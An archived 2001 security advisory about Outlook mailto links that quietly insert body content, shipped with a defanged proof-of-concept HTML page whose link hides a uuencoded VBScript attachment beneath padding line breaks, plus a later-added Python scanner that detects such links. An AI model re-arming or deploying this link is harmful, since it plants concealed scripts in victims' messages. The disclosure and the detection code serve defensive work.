[NEWS] Mailto Links Pose a Security Threat

From: support@securiteam.com
Date: 09/20/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Mailto Links Pose a Security Threat
Message-Id: <20010920132640.DD910138C1@mail.der-keiler.de>
Date: Thu, 20 Sep 2001 15:26:40 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Mailto Links Pose a Security Threat
------------------------------------------------------------------------

SUMMARY

Some mail agents handle mailto links (HTML tags) insecurely and include
any information that follows the BODY parameter in the body of the new
message. The vulnerability allows an attacker to cause the victim to open
a new email message and insert an attachment into it without the user
knowing about it.
The email will not be sent, however, without manual user intervention.

DETAILS

Vulnerable systems:
Outlook version 6.0
Outlook version 98

Immune systems:
Outlook version 2000 SR-1
Netscape Communicator

HTML Example:
<html>
<head>
<title>Demonstration of Malicious mailto's</title>
</head>
<body>
<b> Please click this friendly link to send me mail </b><br>
<!-- This Link should hide a uuencoded VBScript at the bottom of a email
-->
<!-- Written & Discovered by <DontPanic999@yahoo.com> -->
<!-- nb. Works just the same without the "Always Scroll Down bit" ! -->
<a
hr3f="mailto:victim@victim.com?body=Always%20Scroll%20Down%20When%20Following%20mailto's!%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%62%65%67%69%6E%20%36%36%36%20%78%2E%76%62%73%0D%0A%4D%33%35%2D%27%30%44%5D%38%28%45%31%48%3A%37%2C%40%3D%56%25%53%28%26%24%40%3A%26%45%44%39%26%35%4E%28%26%25%54%3D%26%25%43%3A%26%55%45%3B%47%30%41%28%23%51%44%3B%56%59%54%3C%26%25%4E%0D%0A%31%3A%36%2C%59%2E%33%45%20%3E%36%25%48%3B%56%5C%4E%38%56%5D%4D%2F%42%28%60%0D%0A%60%0D%0A%65%6E%64%0D%0A">webmaster@notavictim.com</a><br>
<p>
</body>
</html>

(NOTE: The code does not work 'as-is'. In order for it to function,
replace 'hr3f' with 'href')
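
A defensive check for the pattern shown above, added here and not part of the original advisory: the Python code below scans HTML for mailto links, percent-decodes the BODY parameter, and flags the two traits of the demonstration link, a uuencode "begin" header and a long run of line breaks that pushes the rest of the body out of view. The function names, the ten-line-break threshold and the sample links are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# "begin <mode> <filename>" is the first line of a uuencoded block.
UU_HEADER = re.compile(r"^begin [0-7]{3,4} (\S+)\s*$", re.MULTILINE)
# Ten or more consecutive line breaks; the threshold is an assumption.
BLANK_RUN = re.compile(r"(?:\r?\n){10,}")

def inspect_mailto(href):
    """Return findings for one mailto: URI (empty list means nothing flagged)."""
    parts = urlsplit(href.strip())
    if parts.scheme.lower() != "mailto":
        return []
    # parse_qs percent-decodes the values; match the field name in any case.
    fields = parse_qs(parts.query, keep_blank_values=True)
    bodies = [v for k, vs in fields.items() if k.lower() == "body" for v in vs]
    findings = []
    for body in bodies:
        match = UU_HEADER.search(body)
        if match:
            findings.append("uuencode header, file " + match.group(1))
        if BLANK_RUN.search(body):
            findings.append("padding run of line breaks")
    return findings

class MailtoCollector(HTMLParser):
    """Collect href values that use the mailto: scheme, from any tag."""
    def __init__(self):
        super().__init__()
        self.hrefs = []
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value and value.strip().lower().startswith("mailto:"):
                self.hrefs.append(value)

def scan_html(html):
    """Return [(href, findings)] for every mailto link in the HTML text."""
    collector = MailtoCollector()
    collector.feed(html)
    collector.close()
    return [(href, inspect_mailto(href)) for href in collector.hrefs]

# Constructed sample: one padded link carrying a uuencode block, one plain link.
SAMPLE_HTML = (
    '<a href="mailto:user@example.com?body=Hello' + "%0D%0A" * 25
    + 'begin%20644%20sample.txt%0D%0A%23constructed%0D%0A%60%0D%0Aend%0D%0A">a</a>'
    '<a href="mailto:user@example.com?body=Short%20note">b</a>'
)
```

Calling scan_html(SAMPLE_HTML) returns both links; only the first carries findings.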

ADDITIONAL INFORMATION

The information has been provided by <mailto:dontpanic999@yahoo.com>
[Segmen], <mailto:craig.humphrey@chapmantripp.co.nz> Craig Humphrey, and
<mailto:lennard.bakker@cmg.nl> Lennard Bakker.
